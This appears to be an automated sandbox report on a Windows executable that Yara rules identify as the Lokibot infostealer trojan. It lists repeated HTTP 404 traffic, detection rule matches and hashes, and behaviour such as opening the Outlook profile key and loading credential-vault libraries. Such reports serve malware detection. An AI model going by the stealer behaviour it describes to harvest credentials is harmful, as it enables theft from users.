Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

System Summary

Malicious sample detected (through community Yara rule)

Source: dw7h7aQwVZ.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: dw7h7aQwVZ.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: dw7h7aQwVZ.exe, type: SAMPLE	Matched rule: Loki Payload Author: kevoreilly
Source: dw7h7aQwVZ.exe, type: SAMPLE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: dw7h7aQwVZ.exe, type: SAMPLE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000000.1285704609.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: dw7h7aQwVZ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dw7h7aQwVZ.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: dw7h7aQwVZ.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: dw7h7aQwVZ.exe, type: SAMPLE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: dw7h7aQwVZ.exe, type: SAMPLE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: dw7h7aQwVZ.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000000.1285704609.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/1@0/12

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\8a3743a32cd2c056101b2b9db30747f3_9e146be9-c76a-4720-bcdb-53011b87bd06

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: dw7h7aQwVZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: dw7h7aQwVZ.exe

ReversingLabs: Detection: 97%

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: samcli.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: samlib.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: dw7h7aQwVZ.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Source: dw7h7aQwVZ.exe

Static PE information: section name: .x

Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe	Process information set: NOGPFAULTERRORBOX
